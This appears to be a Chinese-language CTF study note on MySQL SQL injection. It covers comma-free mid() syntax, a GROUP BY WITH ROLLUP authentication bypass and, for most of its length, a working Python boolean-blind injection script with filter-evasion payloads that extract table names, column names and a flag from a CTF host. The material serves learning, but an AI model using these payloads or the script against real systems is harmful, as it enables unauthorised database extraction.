學習筆記 UpdateXml() MYSQL顯錯注入
實驗吧 加了料的報錯注入 https://blog.csdn.net/xingyyn78/article/details/79737070
認真一點報錯注入
mid((database())from(1)for(1))
mid((database())from(2)for(1))
mid((database())from(3)for(1))
如果要用到 mid 函數但逗號被過濾了，可以改用 mid((expr) from (pos) for (len)) 這種不帶逗號的寫法，效果等同於 mid(expr, pos, len)
實驗吧 因缺思汀的繞過
表結構如下:
select *
from `users`
where `user`=-1 || 1
group by `password` with rollup
用了這個語句後結果爲
在password字段聚合了一個null
select *
from `users`
where `user`=-1 || 1
group by `password` with rollup
limit 1 offset 5
跳過前五條，取出 rollup 聚合出來的那個 null 行（把 select * 改成所需的列即可）
配合其他 writeup 食用更佳
https://blog.csdn.net/wy_97/article/details/76085575
https://blog.csdn.net/yplee_8/article/details/52252549
實驗吧 認真一點 —— 布爾盲注腳本（以回應中是否出現 true_state 判斷真假）
import requests
# Target endpoint and the marker that tells a TRUE response from a FALSE one
# (the boolean-blind oracle). Plain HTTP: every payload travels in clear
# text, which is only acceptable against this CTF host.
url = r'http://ctf5.shiyanbar.com/web/earnest/index.php'
true_state = 'You are in'

# Alphabet tried at every character position; order only affects speed
# (likely characters first, symbols last). It contains no quote characters,
# so a candidate can never terminate the single-quoted SQL literal it is
# inserted into. NOTE(review): the backslash in "{\}" is sent as '\' which
# MySQL treats as an escape inside the literal -- that probe is presumably
# always false (harmless, but a wasted request per position).
char_set = r'~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
char_len = len(char_set)

# One Session so cookies set by the target persist across the many probes.
# No timeout is configured on it; a stalled connection blocks the script.
session = requests.session()
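next_line_flag = 0  # number of progress characters printed on the current line


def my_print(char_word, next_line=False):
    """Print brute-force progress to stdout.

    Args:
        char_word: in progress mode the candidate character being tried; in
            result mode the value recovered so far.
        next_line: False prints ``char_word`` inline without a newline,
            wrapping the progress line after 70 characters; True prints
            ``char_word`` as a result on its own line ("OK, got! ...") and
            resets the wrap counter.

    Side effects: writes to stdout and updates the module-level
    ``next_line_flag`` counter.
    """
    global next_line_flag
    if next_line:
        print()
        print('OK, got!', char_word)
        next_line_flag = 0
        return
    if next_line_flag >= 70:
        # Wrap *before* printing so the character that triggers the wrap is
        # still shown instead of being silently dropped.
        print()
        next_line_flag = 0
    print(char_word, end='', flush=True)
    next_line_flag += 1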
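# Filter-bypass conventions used by every payload below: "or", "for",
# "information" and "separator" are written "oorr", "foorr",
# "infoorrmation_schema", "separatoorr" -- presumably the target strips the
# substring "or" once, so the doubled form collapses back to the real
# keyword. Commas are blocked, so mid(x, n, 1) is written
# mid((x)from(n)foorr(1)). Spaces are replaced by \n (chr(0x0a)) before
# sending. Every probe is boolean-blind: a true condition makes true_state
# appear in the response body.

# Step 1: length of the database name.
# database_len = 0
# for x in range(50):
#     payload = "0'oorr((length(database()))=%s)oorr'0" % (x)
#     post_data = {'id': payload}
#     my_print(x)
#     res = session.post(url, data=post_data)
#     if true_state in res.text:
#         my_print(x, True)
#         database_len = x
#         break
database_len = 18  # result of a previous run; drop this line when re-enabling step 1

# Step 2: database name, one character per position.
db_name = ''  # stays empty while step 2 is disabled
# for x in range(database_len):
#     for y in char_set:
#         payload = "0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (x+1, y)
#         post_data = {'id': payload}
#         my_print(y)
#         res = session.post(url, post_data)
#         if true_state in res.text:
#             db_name += y
#             my_print(db_name, True)
#             break

# Step 3: table names of schema ctf_sql_bool_blind, '@'-joined by group_concat.
# table_name = ''
# try:
#     for x in range(50):
#         for y in char_set:
#             payload = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='%s')oorr'0" % (x+1, y)
#             payload = payload.replace(' ', chr(0x0a))
#             post_data = {'id': payload}
#             my_print(y)
#             res = session.post(url, data=post_data)
#             if true_state in res.text:
#                 table_name += y
#                 my_print(table_name, True)
#                 break
# except KeyboardInterrupt:
#     print('\nStopped brute-forcing table names, moving on')
table_name = 'fiag'  # recovered by step 3

# Step 4: column names of table fiag. This step did not complete reliably
# ("the column names seem broken"); the list recovered earlier was
#   fl$4g@id@username@password
# so the flag column is fl$4g.
# column_name = ''
# try:
#     for x in range(50):
#         for y in char_set:
#             payload = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (x+1, y)
#             payload = payload.replace(' ', chr(0x0a))
#             post_data = {'id': payload}
#             my_print(y)
#             res = session.post(url, data=post_data)
#             if true_state in res.text:
#                 column_name += y
#                 my_print(column_name, True)
#                 break
# except KeyboardInterrupt:
#     print('\nStopped brute-forcing column names, moving on')
column_name = r'fl$4g'  # the flag column; the dead intermediate assignments were dropped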
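flag_dump = ''


def extract_column(session, url, true_state, char_set, table, column, *,
                   max_len=50, progress=None, timeout=10):
    """Recover one column value character by character via boolean-blind SQLi.

    For every position 1..max_len each character of ``char_set`` is probed
    with a payload of the form
    ``0'oorr((select(mid((column)from(pos)foorr(1)))from(table))='c')oorr'0``
    (spaces replaced by \\n); a response containing ``true_state`` means the
    guess is right. Extraction stops at the first position where no candidate
    matches -- normally the end of the value, but also a character that is
    not in ``char_set``, in which case the result is truncated there.

    Args:
        session: object with ``post(url, data=..., timeout=...)`` returning an
            object exposing ``.text`` (a requests Session fits).
        url: target endpoint; the payload is sent as the ``id`` form field.
        true_state: substring that marks a TRUE response.
        char_set: candidate characters, tried in order.
        table, column: identifiers spliced verbatim into the payload (no
            quoting, no ``%`` allowed in them).
        max_len: maximum number of positions to probe.
        progress: callback ``progress(text, done=False)``; defaults to
            ``my_print``. Called with each candidate, and with the value
            recovered so far (``done=True``) after every hit.
        timeout: per-request timeout in seconds, so a stalled target cannot
            hang the extraction indefinitely.

    Returns:
        The recovered string; on KeyboardInterrupt the partial value.
    """
    if progress is None:
        progress = my_print
    template = "0'oorr((select(mid((%s)from(%s)foorr(1)))from(%s))='%s')oorr'0"
    found = ''
    try:
        for pos in range(1, max_len + 1):
            for ch in char_set:
                payload = (template % (column, pos, table, ch)).replace(' ', chr(0x0a))
                progress(ch)
                res = session.post(url, data={'id': payload}, timeout=timeout)
                if true_state in res.text:
                    found += ch
                    progress(found, True)
                    break
            else:
                # No candidate matched at this position: end of value (or a
                # character outside char_set); probing further is pointless.
                break
    except KeyboardInterrupt:
        print('\nInterrupted; returning the partial value')
    return found


if __name__ == '__main__':
    flag_dump = extract_column(session, url, true_state, char_set,
                               table_name, column_name)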